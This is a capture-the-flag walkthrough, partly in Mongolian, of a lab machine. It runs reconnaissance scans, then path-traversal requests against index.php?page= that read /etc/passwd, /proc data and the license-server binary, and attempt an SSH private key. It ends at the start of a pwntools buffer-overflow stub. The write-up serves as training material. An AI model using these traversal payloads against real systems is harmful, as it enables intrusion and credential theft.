1. IP Address
# Machine Address
10.10.11.154
# Local Address
10.10.14.121
2. Nmap & Nikto
Nmap
nmap -sV -sC -oA nmap/retired 10.10.11.154
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-10 05:47 EDT
Nmap scan report for 10.10.11.154
Host is up (0.24s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 77:b2:16:57:c2:3c:10:bf:20:f1:62:76:ea:81:e4:69 (RSA)
| 256 cb:09:2a:1b:b9:b9:65:75:94:9d:dd:ba:11:28:5b:d2 (ECDSA)
|_ 256 0d:40:f0:f5:a8:4b:63:29:ae:08:a1:66:c1:26:cd:6b (ED25519)
80/tcp open http nginx
| http-title: Agency - Start Bootstrap Theme
|_Requested resource was /index.php?page=default.html
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.80 seconds
Nikto
nikto -h 10.10.11.154
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.11.154
+ Target Hostname: 10.10.11.154
+ Target Port: 80
+ Start Time: 2022-04-11 02:57:42 (GMT-4)
---------------------------------------------------------------------------
+ Server: nginx
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: /index.php?page=default.html
+ No CGI Directories found (use '-C all' to force check all possible dirs)
3. Gobuster
CLI
gobuster dir -u http://10.10.11.154 -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
Result
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.11.154
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/04/11 03:01:50 Starting gobuster in directory enumeration mode
===============================================================
/assets (Status: 301) [Size: 162] [--> http://10.10.11.154/assets/]
/css (Status: 301) [Size: 162] [--> http://10.10.11.154/css/]
/js (Status: 301) [Size: 162] [--> http://10.10.11.154/js/]
-x php нэмээд үзвэл:
gobuster dir -u http://10.10.11.154/ -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -x php
4. Feroxbuster
CLI
feroxbuster -u http://10.10.11.154 -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt
Result
by Ben "epi" Risher 🤓 ver: 2.3.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.10.11.154
🚀 Threads │ 50
📖 Wordlist │ /opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.3.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
301 7l 11w 162c http://10.10.11.154/js
301 7l 11w 162c http://10.10.11.154/css
301 7l 11w 162c http://10.10.11.154/assets
301 7l 11w 162c http://10.10.11.154/assets/img
301 7l 11w 162c http://10.10.11.154/assets/img/about
301 7l 11w 162c http://10.10.11.154/assets/img/logos
301 7l 11w 162c http://10.10.11.154/assets/img/team
[####################] - 2m 239992/239992 0s found:7 errors:36
[####################] - 2m 29999/29999 196/s http://10.10.11.154
[####################] - 2m 29999/29999 195/s http://10.10.11.154/js
[####################] - 2m 29999/29999 195/s http://10.10.11.154/css
[####################] - 2m 29999/29999 195/s http://10.10.11.154/assets
[####################] - 2m 29999/29999 196/s http://10.10.11.154/assets/img
[####################] - 2m 29999/29999 196/s http://10.10.11.154/assets/img/about
[####################] - 2m 29999/29999 195/s http://10.10.11.154/assets/img/logos
[####################] - 2m 29999/29999 196/s http://10.10.11.154/assets/img/team
5. LFI
Burp-с;
GET /index.php?page=../../../../../../../../../../etc/passwd HTTP/1.1
Host: 10.10.11.154
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Result
HTTP/1.1 302 Found
Server: nginx
Date: Mon, 11 Apr 2022 09:09:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Location: /index.php?page=default.html
Content-Length: 1488
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:101:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:105::/nonexistent:/usr/sbin/nologin
_chrony:x:105:112:Chrony daemon,,,:/var/lib/chrony:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
vagrant:x:1000:1000::/vagrant:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
dev:x:1001:1001::/home/dev:/bin/bash
passwd-с dev хэрэглэгч /home/dev dir-г харж болж байна.
GET /index.php?page=../../../../../../../../../../home/dev/.ssh/id_rsa HTTP/1.1
GET /index.php?page=../../../../../../../../../../home/dev/user.txt HTTP/1.1
дээр байгааг үзэхээр болоогүй.
/prod/sched_debug
index.php?page=../../../../../../../../../../prod/sched_debug
index.php
<?php
function sanitize_input($param) {
$param1 = str_replace("../","",$param);
$param2 = str_replace("./","",$param1);
return $param2;
}
$page = $_GET['page'];
if (isset($page) && preg_match("/^[a-z]/", $page)) {
$page = sanitize_input($page);
} else {
header('Location: /index.php?page=default.html');
}
readfile($page);
?>
http://10.10.11.154/index.php?page=beta.html beta.html
<form action="activate_license.php" method="post" enctype="multipart/form-data">
<label for="formFile" class="form-label">Upload License Key File</label>
<input class="form-control form-control-lg" id="formFile" type="file" name="licensefile"/>
<button type="submit" class="btn btn-primary">Submit</button>
</form>
http://10.10.11.154/index.php?page=activate_license.php
GET /index.php?page=activate_license.php HTTP/1.1
Host: 10.10.11.154
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Currently development for EMUEMU just started, but we have big plans. If you bought an OSTRICH console from us and want want to be part of the next step, you can enable your OSTRICH license for usage with EMUEMU via the activate_license application today for our upcoming beta testing program for EMUEMU. A license files contains a 512 bit key. That key is also in the QR code contained within the OSTRICH package. Thank you for participating in our beta testing program. Upload License Key File
activate_license.php
<?php
if(isset($_FILES['licensefile'])) {
$license = file_get_contents($_FILES['licensefile']['tmp_name']);
$license_size = $_FILES['licensefile']['size'];
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if (!$socket) { echo "error socket_create()\n"; }
if (!socket_connect($socket, '127.0.0.1', 1337)) {
echo "error socket_connect()" . socket_strerror(socket_last_error()) . "\n";
}
socket_write($socket, pack("N", $license_size));
socket_write($socket, $license);
socket_shutdown($socket);
socket_close($socket);
}
?>
GET /index.php?page=../../../../../../../../../../proc/sched_debug HTTP/1.1
Host: 10.10.11.154
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
proc/sched_debug
HTTP/1.1 302 Found
Server: nginx
Date: Wed, 13 Apr 2022 03:51:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Location: /index.php?page=default.html
Content-Length: 26169
Sched Debug Version: v0.11, 5.10.0-11-amd64 #1
ktime : 84680521.804596
sched_clk : 84680203.312486
cpu_clk : 84680188.015484
jiffies : 4316062397
sched_clock_stable() : 1
sysctl_sched
.sysctl_sched_latency : 12.000000
.sysctl_sched_min_granularity : 1.500000
.sysctl_sched_wakeup_granularity : 2.000000
.sysctl_sched_child_runs_first : 0
.sysctl_sched_features : 16722747
.sysctl_sched_tunable_scaling : 1 (logarithmic)
cpu#0, 2994.375 MHz
.nr_running : 1
.nr_switches : 5155430
.nr_uninterruptible : 97
.next_balance : 4316.062369
.curr->pid : 13721
.clock : 84680187.755306
.clock_task : 84680187.755306
.avg_idle : 882136
.max_idle_balance_cost : 500000
cfs_rq[0]:/
.exec_clock : 0.000000
.MIN_vruntime : 0.000001
.min_vruntime : 470279.159394
.max_vruntime : 0.000001
.spread : 0.000000
.spread0 : 0.000000
.nr_spread_over : 0
.nr_running : 1
.load : 1048576
.load_avg : 9
.runnable_avg : 9
.util_avg : 9
.util_est_enqueued : 8
.removed.load_avg : 0
.removed.util_avg : 0
.removed.runnable_avg : 0
.tg_load_avg_contrib : 0
.tg_load_avg : 0
.throttled : 0
.throttle_count : 0
rt_rq[0]:
.rt_nr_running : 0
.rt_nr_migratory : 0
.rt_throttled : 0
.rt_time : 0.000000
.rt_runtime : 950.000000
dl_rq[0]:
.dl_nr_running : 0
.dl_nr_migratory : 0
.dl_bw->bw : 996147
.dl_bw->total_bw : 0
runnable tasks:
S task PID tree-key switches prio wait-time sum-exec sum-sleep
-------------------------------------------------------------------------------------------------------------
S systemd 1 470273.931361 26356 120 0.000000 12154.194523 0.000000 0 0 /
S kthreadd 2 470118.249610 798 120 0.000000 43.232385 0.000000 0 0 /
I rcu_gp 3 13.977682 2 100 0.000000 0.004629 0.000000 0 0 /
I rcu_par_gp 4 15.978414 2 100 0.000000 0.002695 0.000000 0 0 /
I kworker/0:0H 6 728.727785 4 100 0.000000 0.023474 0.000000 0 0 /
I mm_percpu_wq 9 22.732288 2 100 0.000000 0.002565 0.000000 0 0 /
S rcu_tasks_rude_ 10 24.733774 2 120 0.000000 0.002515 0.000000 0 0 /
S rcu_tasks_trace 11 26.734425 2 120 0.000000 0.002135 0.000000 0 0 /
S ksoftirqd/0 12 470273.303445 234438 120 0.000000 3866.137484 0.000000 0 0 /
I rcu_sched 13 470278.635149 1398813 120 0.000000 17658.025786 0.000000 0 0 /
S migration/0 14 0.000000 21279 0 0.000000 443.966905 0.000000 0 0 /
S cpuhp/0 15 2355.724616 10 120 0.000000 0.209440 0.000000 0 0 /
I netns 24 64.773608 2 100 0.000000 0.028563 0.000000 0 0 /
S khungtaskd 26 470147.700559 702 120 0.000000 79.915165 0.000000 0 0 /
S oom_reaper 27 74.895783 2 120 0.000000 0.000000 0.000000 0 0 /
I writeback 28 80.895780 2 100 0.000000 0.000000 0.000000 0 0 /
S ksmd 30 92.895774 2 125 0.000000 0.000000 0.000000 0 0 /
I kintegrityd 49 374.954142 2 100 0.000000 0.000000 0.000000 0 0 /
I kblockd 50 380.954139 2 100 0.000000 0.000000 0.000000 0 0 /
I edac-poller 52 666.594020 2 100 0.000000 0.000000 0.000000 0 0 /
I kworker/0:1H 54 470273.162678 44338 100 0.000000 1002.530760 0.000000 0 0 /
S kswapd0 56 969.541102 3 120 0.000000 0.044243 0.000000 0 0 /
I kthrotld 57 767.223323 2 100 0.000000 0.038923 0.000000 0 0 /
S irq/24-pciehp 58 0.000000 2 49 0.000000 0.047507 0.000000 0 0 /
S irq/26-pciehp 60 0.000000 2 49 0.000000 0.032440 0.000000 0 0 /
S irq/28-pciehp 62 0.000000 2 49 0.000000 0.028022 0.000000 0 0 /
S irq/30-pciehp 64 0.000000 2 49 0.000000 0.030929 0.000000 0 0 /
S irq/32-pciehp 66 0.000000 2 49 0.000000 0.102563 0.000000 0 0 /
S irq/34-pciehp 68 0.000000 2 49 0.000000 0.033433 0.000000 0 0 /
S irq/36-pciehp 70 0.000000 2 49 0.000000 0.048562 0.000000 0 0 /
S irq/38-pciehp 72 0.000000 2 49 0.000000 0.053139 0.000000 0 0 /
S irq/40-pciehp 74 0.000000 2 49 0.000000 0.032441 0.000000 0 0 /
S irq/42-pciehp 76 0.000000 2 49 0.000000 0.061664 0.000000 0 0 /
S irq/44-pciehp 78 0.000000 2 49 0.000000 0.059964 0.000000 0 0 /
S irq/46-pciehp 80 0.000000 2 49 0.000000 0.045345 0.000000 0 0 /
S irq/48-pciehp 82 0.000000 2 49 0.000000 0.072327 0.000000 0 0 /
S irq/50-pciehp 84 0.000000 2 49 0.000000 0.046387 0.000000 0 0 /
S irq/52-pciehp 86 0.000000 2 49 0.000000 0.095389 0.000000 0 0 /
S irq/54-pciehp 88 0.000000 2 49 0.000000 0.035466 0.000000 0 0 /
I acpi_thermal_pm 90 900.787224 2 100 0.000000 0.031008 0.000000 0 0 /
I ipv6_addrconf 92 905.235396 2 100 0.000000 0.018906 0.000000 0 0 /
I kstrp 101 953.365437 2 100 0.000000 0.041096 0.000000 0 0 /
I zswap-shrink 104 1008.899177 2 100 0.000000 0.065664 0.000000 0 0 /
I kworker/u5:0 105 1012.917683 2 100 0.000000 0.022132 0.000000 0 0 /
S scsi_eh_0 151 1318.113572 6 120 0.000000 82.957574 0.000000 0 0 /
S scsi_eh_2 159 1559.312628 26 120 0.000000 0.523253 0.000000 0 0 /
I mpt_poll_0 160 1238.381341 2 100 0.000000 0.031669 0.000000 0 0 /
I mpt/0 161 1241.401738 2 100 0.000000 0.021510 0.000000 0 0 /
I scsi_tmf_2 162 1318.093461 2 100 0.000000 0.012252 0.000000 0 0 /
I scsi_tmf_3 164 1326.099880 2 100 0.000000 0.008556 0.000000 0 0 /
I scsi_tmf_4 166 1330.103473 2 100 0.000000 0.004669 0.000000 0 0 /
I scsi_tmf_5 168 1334.122953 2 100 0.000000 0.020759 0.000000 0 0 /
I scsi_tmf_6 170 1338.139234 2 100 0.000000 0.017383 0.000000 0 0 /
S scsi_eh_7 171 1559.297499 26 120 0.000000 0.312517 0.000000 0 0 /
I scsi_tmf_7 172 1342.155522 2 100 0.000000 0.017142 0.000000 0 0 /
I scsi_tmf_8 174 1346.169972 2 100 0.000000 0.015570 0.000000 0 0 /
S scsi_eh_9 175 1559.343885 26 120 0.000000 0.355466 0.000000 0 0 /
I scsi_tmf_9 176 1350.184659 2 100 0.000000 0.015699 0.000000 0 0 /
S scsi_eh_10 177 1559.415509 26 120 0.000000 0.414236 0.000000 0 0 /
I scsi_tmf_10 178 1354.200381 2 100 0.000000 0.016962 0.000000 0 0 /
I scsi_tmf_11 180 1358.214386 2 100 0.000000 0.014997 0.000000 0 0 /
I scsi_tmf_12 182 1362.229003 2 100 0.000000 0.015599 0.000000 0 0 /
I scsi_tmf_13 184 1366.243037 2 100 0.000000 0.014927 0.000000 0 0 /
I scsi_tmf_14 186 1370.257565 2 100 0.000000 0.015620 0.000000 0 0 /
S scsi_eh_15 187 1559.283563 26 120 0.000000 0.350127 0.000000 0 0 /
I scsi_tmf_15 188 1374.272092 2 100 0.000000 0.015519 0.000000 0 0 /
S scsi_eh_16 189 1559.244359 26 120 0.000000 0.308008 0.000000 0 0 /
I scsi_tmf_16 190 1378.286038 2 100 0.000000 0.014948 0.000000 0 0 /
S scsi_eh_17 191 1559.243517 26 120 0.000000 0.313205 0.000000 0 0 /
I scsi_tmf_17 192 1382.416404 2 100 0.000000 0.131477 0.000000 0 0 /
S scsi_eh_18 193 1559.257142 26 120 0.000000 0.333966 0.000000 0 0 /
I scsi_tmf_18 194 1386.432996 2 100 0.000000 0.017623 0.000000 0 0 /
I scsi_tmf_19 196 1390.448174 2 100 0.000000 0.016121 0.000000 0 0 /
S scsi_eh_20 197 1559.334488 26 120 0.000000 0.404589 0.000000 0 0 /
I scsi_tmf_20 198 1394.464114 2 100 0.000000 0.016892 0.000000 0 0 /
I scsi_tmf_21 200 1398.478440 2 100 0.000000 0.015298 0.000000 0 0 /
I scsi_tmf_22 202 1402.493539 2 100 0.000000 0.016130 0.000000 0 0 /
S scsi_eh_23 203 1559.348615 26 120 0.000000 0.312147 0.000000 0 0 /
I scsi_tmf_23 204 1406.505911 2 100 0.000000 0.013285 0.000000 0 0 /
I scsi_tmf_24 206 1410.517302 2 100 0.000000 0.012373 0.000000 0 0 /
S scsi_eh_25 207 1559.343972 26 120 0.000000 0.309217 0.000000 0 0 /
I scsi_tmf_25 208 1414.534994 2 100 0.000000 0.018595 0.000000 0 0 /
S scsi_eh_26 209 1559.163536 26 120 0.000000 0.262300 0.000000 0 0 /
I scsi_tmf_26 210 1418.549100 2 100 0.000000 0.014989 0.000000 0 0 /
S scsi_eh_27 211 1559.186772 26 120 0.000000 0.282339 0.000000 0 0 /
I scsi_tmf_27 212 1422.563427 2 100 0.000000 0.015249 0.000000 0 0 /
I scsi_tmf_28 214 1426.577082 2 100 0.000000 0.014637 0.000000 0 0 /
S scsi_eh_29 215 1559.162677 26 120 0.000000 0.259530 0.000000 0 0 /
I scsi_tmf_29 216 1430.590988 2 100 0.000000 0.014778 0.000000 0 0 /
S scsi_eh_30 217 1559.178394 26 120 0.000000 0.274322 0.000000 0 0 /
I scsi_tmf_30 218 1434.605655 2 100 0.000000 0.015600 0.000000 0 0 /
S scsi_eh_31 219 1559.163257 26 120 0.000000 0.259427 0.000000 0 0 /
S scsi_eh_32 249 1561.040280 2 120 0.000000 0.035516 0.000000 0 0 /
I scsi_tmf_32 250 1565.065283 2 100 0.000000 0.027331 0.000000 0 0 /
I ext4-rsv-conver 282 1755.018274 3 100 0.000000 0.019756 0.000000 0 0 /
S systemd-udevd 348 470187.031091 1458 120 0.000000 283.819041 0.000000 0 0 /
S gmain 571 11352.409969 146 120 0.000000 1.806799 0.000000 0 0 /
S activate_licens 418 446273.871782 30 120 0.000000 9.136912 0.000000 0 0 /
S cron 420 470273.288456 2919 120 0.000000 762.280155 0.000000 0 0 /
S dbus-daemon 421 470273.611542 18280 120 0.000000 4401.913468 0.000000 0 0 /
S systemd-logind 435 470273.458224 18341 120 0.000000 2257.399290 0.000000 0 0 /
S hwmon1 476 5018.456000 2 120 0.000000 0.022742 0.000000 0 0 /
S php-fpm7.4 534 470274.643375 93194 120 0.000000 5149.097210 0.000000 0 0 /
S agetty 537 10135.820186 8 120 0.000000 4.053591 0.000000 0 0 /
S sshd 542 457594.772813 369 120 0.000000 108.212769 0.000000 0 0 /
S nginx 544 470273.613225 1265337 120 0.000000 256203.405254 0.000000 0 0 /
S chronyd 546 464357.367909 129 120 0.000000 14.518773 0.000000 0 0 /
S chronyd 547 464357.346779 188 120 0.000000 28.587065 0.000000 0 0 /
S php-fpm7.4 13565 469573.518637 70318 120 0.000000 11646.371496 0.000000 0 0 /
S php-fpm7.4 13704 470163.882496 52668 120 0.000000 11328.008245 0.000000 0 0 /
>R php-fpm7.4 13721 470273.193438 52166 120 0.000000 9299.603609 0.000000 0 0 /
I kworker/0:1 32426 470274.666697 24804 120 0.000000 717.247851 0.000000 0 0 /
I kworker/u4:0 35199 470273.543113 1039 120 0.000000 55.980461 0.000000 0 0 /
I kworker/u4:2 35526 470124.294341 416 120 0.000000 23.683800 0.000000 0 0 /
I kworker/0:2 35926 469600.704800 9 120 0.000000 0.115347 0.000000 0 0 /
I kworker/u4:1 36028 470274.534095 87 120 0.000000 4.921252 0.000000 0 0 /
cpu#1, 2994.375 MHz
.nr_running : 0
.nr_switches : 11377902
.nr_uninterruptible : -97
.next_balance : 4316.062370
.curr->pid : 0
.clock : 84680183.209272
.clock_task : 84680183.209272
.avg_idle : 1000000
.max_idle_balance_cost : 500000
cfs_rq[1]:/
.exec_clock : 0.000000
.MIN_vruntime : 0.000001
.min_vruntime : 468595.964356
.max_vruntime : 0.000001
.spread : 0.000000
.spread0 : -1683.195038
.nr_spread_over : 0
.nr_running : 0
.load : 0
.load_avg : 0
.runnable_avg : 0
.util_avg : 0
.util_est_enqueued : 0
.removed.load_avg : 0
.removed.util_avg : 0
.removed.runnable_avg : 0
.tg_load_avg_contrib : 0
.tg_load_avg : 0
.throttled : 0
.throttle_count : 0
rt_rq[1]:
.rt_nr_running : 0
.rt_nr_migratory : 0
.rt_throttled : 0
.rt_time : 0.069640
.rt_runtime : 950.000000
dl_rq[1]:
.dl_nr_running : 0
.dl_nr_migratory : 0
.dl_bw->bw : 996147
.dl_bw->total_bw : 0
runnable tasks:
S task PID tree-key switches prio wait-time sum-exec sum-sleep
-------------------------------------------------------------------------------------------------------------
S cpuhp/1 16 1925.910783 10 120 0.000000 0.125863 0.000000 0 0 /
S migration/1 17 0.000000 21244 0 0.000000 478.944269 0.000000 0 0 /
S ksoftirqd/1 18 468578.705180 234364 120 0.000000 3687.323637 0.000000 0 0 /
I kworker/1:0H 20 817.144023 5 100 0.000000 0.031758 0.000000 0 0 /
S kdevtmpfs 23 3672.685848 128 120 0.000000 0.895750 0.000000 0 0 /
S kauditd 25 1773.778542 7 120 0.000000 1.538124 0.000000 0 0 /
S kcompactd0 29 468589.493121 165392 120 0.000000 2888.144105 0.000000 0 0 /
S khugepaged 31 468588.783514 14660 139 0.000000 1965.951916 0.000000 0 0 /
I blkcg_punt_bio 51 30.719385 2 100 0.000000 0.006112 0.000000 0 0 /
I devfreq_wq 53 36.721191 2 100 0.000000 0.003166 0.000000 0 0 /
S irq/25-pciehp 59 0.000000 3 49 0.000000 0.059041 0.000000 0 0 /
S irq/27-pciehp 61 0.000000 3 49 0.000000 0.059552 0.000000 0 0 /
S irq/29-pciehp 63 0.000000 3 49 0.000000 0.060093 0.000000 0 0 /
S irq/31-pciehp 65 0.000000 3 49 0.000000 0.139933 0.000000 0 0 /
S irq/33-pciehp 67 0.000000 3 49 0.000000 0.073699 0.000000 0 0 /
S irq/35-pciehp 69 0.000000 3 49 0.000000 0.068078 0.000000 0 0 /
S irq/37-pciehp 71 0.000000 3 49 0.000000 0.080543 0.000000 0 0 /
S irq/39-pciehp 73 0.000000 3 49 0.000000 0.118641 0.000000 0 0 /
S irq/41-pciehp 75 0.000000 3 49 0.000000 0.083087 0.000000 0 0 /
S irq/43-pciehp 77 0.000000 3 49 0.000000 0.072787 0.000000 0 0 /
S irq/45-pciehp 79 0.000000 3 49 0.000000 0.153119 0.000000 0 0 /
S irq/47-pciehp 81 0.000000 3 49 0.000000 0.063015 0.000000 0 0 /
S irq/49-pciehp 83 0.000000 3 49 0.000000 0.060424 0.000000 0 0 /
S irq/51-pciehp 85 0.000000 3 49 0.000000 0.074419 0.000000 0 0 /
S irq/53-pciehp 87 0.000000 3 49 0.000000 0.084679 0.000000 0 0 /
S irq/55-pciehp 89 0.000000 3 49 0.000000 0.074229 0.000000 0 0 /
I kworker/1:1H 91 468587.284735 19166 100 0.000000 429.652332 0.000000 0 0 /
I ata_sff 150 1064.213540 2 100 0.000000 0.004478 0.000000 0 0 /
I scsi_tmf_0 152 1071.218263 2 100 0.000000 0.006162 0.000000 0 0 /
S scsi_eh_1 153 1112.506859 4 120 0.000000 11.165957 0.000000 0 0 /
I scsi_tmf_1 154 1079.223485 2 100 0.000000 0.008987 0.000000 0 0 /
S scsi_eh_3 163 1354.203716 26 120 0.000000 0.318601 0.000000 0 0 /
S scsi_eh_4 165 1354.364173 26 120 0.000000 0.594965 0.000000 0 0 /
S scsi_eh_5 167 1354.265520 26 120 0.000000 0.378000 0.000000 0 0 /
S scsi_eh_6 169 1354.359390 26 120 0.000000 0.474015 0.000000 0 0 /
S scsi_eh_8 173 1354.266204 26 120 0.000000 0.299895 0.000000 0 0 /
S scsi_eh_11 179 1354.319499 26 120 0.000000 0.347599 0.000000 0 0 /
S scsi_eh_12 181 1354.294967 26 120 0.000000 0.327516 0.000000 0 0 /
S scsi_eh_13 183 1354.305362 26 120 0.000000 0.333553 0.000000 0 0 /
S scsi_eh_14 185 1354.313890 26 120 0.000000 0.297549 0.000000 0 0 /
S scsi_eh_19 195 1354.365835 26 120 0.000000 0.338002 0.000000 0 0 /
S scsi_eh_21 199 1354.259069 26 120 0.000000 0.231276 0.000000 0 0 /
S scsi_eh_22 201 1354.287901 26 120 0.000000 0.261962 0.000000 0 0 /
S scsi_eh_24 205 1354.357431 26 120 0.000000 0.329507 0.000000 0 0 /
S scsi_eh_28 213 1354.362151 26 120 0.000000 0.334969 0.000000 0 0 /
I scsi_tmf_31 220 1326.966833 2 100 0.000000 0.016151 0.000000 0 0 /
S jbd2/sda1-8 281 468587.491477 46702 120 0.000000 2213.353470 0.000000 0 0 /
S systemd-journal 332 468570.029689 74993 120 0.000000 11469.204517 0.000000 0 0 /
S VGAuthService 388 3672.933937 102 120 0.000000 24.317929 0.000000 0 0 /
S vmtoolsd 389 468591.640059 974905 120 0.000000 75748.585991 0.000000 0 0 /
S HangDetector 478 468589.235347 84811 120 0.000000 3271.888116 0.000000 0 0 /
I cryptd 394 1821.306494 2 100 0.000000 0.025498 0.000000 0 0 /
S irq/16-vmwgfx 398 0.000000 315126 49 0.000000 6109.678753 0.000000 0 0 /
I ttm_swap 404 1846.587609 2 100 0.000000 0.005039 0.000000 0 0 /
S card0-crtc0 405 0.000000 2 49 0.000000 0.003597 0.000000 0 0 /
S card0-crtc1 406 0.000000 2 49 0.000000 0.003386 0.000000 0 0 /
S card0-crtc2 407 0.000000 2 49 0.000000 0.003096 0.000000 0 0 /
S card0-crtc3 408 0.000000 2 49 0.000000 0.002765 0.000000 0 0 /
S card0-crtc4 409 0.000000 2 49 0.000000 0.002965 0.000000 0 0 /
S card0-crtc5 410 0.000000 2 49 0.000000 0.002695 0.000000 0 0 /
S card0-crtc6 411 0.000000 2 49 0.000000 0.002484 0.000000 0 0 /
S card0-crtc7 412 0.000000 2 49 0.000000 0.002435 0.000000 0 0 /
S rsyslogd 423 468436.598541 176 120 0.000000 15.178844 0.000000 0 0 /
S in:imuxsock 438 468569.565158 41729 120 0.000000 1456.008380 0.000000 0 0 /
S in:imklog 439 459624.836862 16 120 0.000000 3.803078 0.000000 0 0 /
S rs:main Q:Reg 440 468569.559458 41671 120 0.000000 1326.234113 0.000000 0 0 /
S nginx 541 425815.900707 5 120 0.000000 0.860043 0.000000 0 0 /
S nginx 543 465475.646747 616996 120 0.000000 141323.361247 0.000000 0 0 /
S sshd 31241 410461.163963 32 120 0.000000 32.728368 0.000000 0 0 /
S sshd 31249 468578.986207 464 120 0.000000 56.943783 0.000000 0 0 /
S bash 31250 413038.940766 89 120 0.000000 34.014433 0.000000 0 0 /
I kworker/u4:3 35630 468153.297932 550 120 0.000000 29.587530 0.000000 0 0 /
I kworker/1:0 35699 468595.964356 33275 120 0.000000 1341.618264 0.000000 0 0 /
I kworker/1:2 35985 468359.826004 15 120 0.000000 0.156181 0.000000 0 0 /
activate_licens
S task PID tree-key switches prio wait-time sum-exec sum-sleep
-------------------------------------------------------------------------------------------------------------
activate_licens 418 446273.871782 30 120 0.000000 9.136912 0.000000 0 0 /
PID -> 418
GET /index.php?page=../../../../../../../../../../proc/418/exe HTTP/1.1
Host: 10.10.11.154
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
burp-s save file хийнэ.
6. Buffer Overflow
burp-s save хийсэн файлаа binary нэртэй болгоод execute хийж үзэв:
chmod +x binary
./binary 1337
[+] starting server listening on port 1337
[+] listening ..
#!/usr/bin/env python3
from pwn import *
r = remote("127.0.0.1", 1337)
gdb.attach(r) # debug in gdb
(No debugging symbols found in /lib/x86_64-linux-gnu/libsqlite3.so.0)
Reading symbols from /lib/x86_64-linux-gnu/libc.so.6...
Reading symbols from /usr/lib/debug/.build-id/54/eef5ce96cf37cb175b0d93186836ca1caf470c.debug...
Reading symbols from /lib/x86_64-linux-gnu/libm.so.6...
Reading symbols from /usr/lib/debug/.build-id/e9/d2c06479b13dd3cfa78d714d11dccf6fcbee51.debug...
